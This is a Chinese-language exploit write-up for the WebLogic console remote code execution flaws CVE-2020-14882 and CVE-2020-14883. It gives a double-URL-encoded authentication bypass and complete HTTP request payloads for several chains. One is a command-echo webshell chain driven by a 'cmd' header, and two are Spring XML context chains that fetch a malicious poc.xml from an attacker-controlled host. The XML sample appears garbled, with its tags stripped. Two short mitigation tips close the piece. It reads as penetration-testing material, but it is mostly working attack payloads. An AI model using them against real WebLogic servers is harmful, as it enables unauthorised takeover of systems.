Weblogic console 接口远程代码执行漏洞

Weblogic console HTTP协议代码执行漏洞

漏洞介绍：

Weblogic console接口存在远程代码执行漏洞，漏洞使用协议为HTTP，漏洞编号为CVE-2020-14882，CVE-2020-14883，漏洞等级为严重。远程攻击者可以构造特殊的HTTP请求，可以通过滥用静态资源来绕过Weblogic认证进行未授权远程代码执行。

漏洞影响版本：

10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

漏洞利用：

0、未授权绕过认证

通过滥用静态资源来进行绕过Weblogic认证：

/console/images/../console.portal
通过对该进行未授权认证Payload进行两次URL编码得到如下Payload：
/console/images/%252E%252E%252Fconsole.portal
/console/css/%252E%252E%252Fconsole.portal

0.png

1、ShellSession

通过调用ShellSession方法执行命令：

依赖包：coherence.jar

调用方法：com.tangosol.coherence.mvel2.sh.ShellSession

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.44.143:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime('calc.exe');");

ShellSession结合consolejndi.portal回显利用：
10.3.6.0的版本中提示无com.tangosol.coherence.mvel2.sh.ShellSession类，该利用链适用于12版本及以上：

GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread=(weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
Host: 192.168.44.143:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.8,zh-CN;q=0.7,zh;q=0.5,zh-TW;q=0.3,zh-HK;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 0
cmd: whoami

image.png

2、FileSystemXmlApplicationContext

通过调用FileSystemXmlApplicationContext加载远程xml进行jndi注入，该利用连适用于weblogic 10版本，但该利用链需要出网加载外部xml文件。故此存在限制。

依赖包：com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar

调用方法：com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.44.143:843/poc.xml") HTTP/1.1
Host: 192.168.44.143:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.8,zh-CN;q=0.7,zh;q=0.5,zh-TW;q=0.3,zh-HK;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

该利用链适用于10版本及以上，但需要服务器出网加载恶意xml文件来进行执行命令：

1.png

发送Payload进行加载恶意XML文件执行命令：

2.png

执行结果如下：

3.png

3、ClassPathXmlApplicationContext

通过调用ClassPathXmlApplicationContext加载远程xml进行jndi注入，该利用链适用于weblogic 10版本。但该利用链需要出网加载外部xml文件。故此存在限制。

依赖包：com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar

调用方法：com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://192.168.44.143:8413/poc.xml") HTTP/1.1
Host: 192.168.44.143:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en,en-US;q=0.8,zh-CN;q=0.7,zh;q=0.5,zh-TW;q=0.3,zh-HK;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

windows类型机器poc.xml文件如下：

  
    
      
        cmd
        /c
        
      
    
  

linux机器只需替换命令格式即可：

  
    
      
        bash
        -c
        
      
    
  

安全建议：

1、防火墙设置禁止外部访问/console/console.portal接口

2、彻底删除console后台

参考文章：https://github.com/jas502n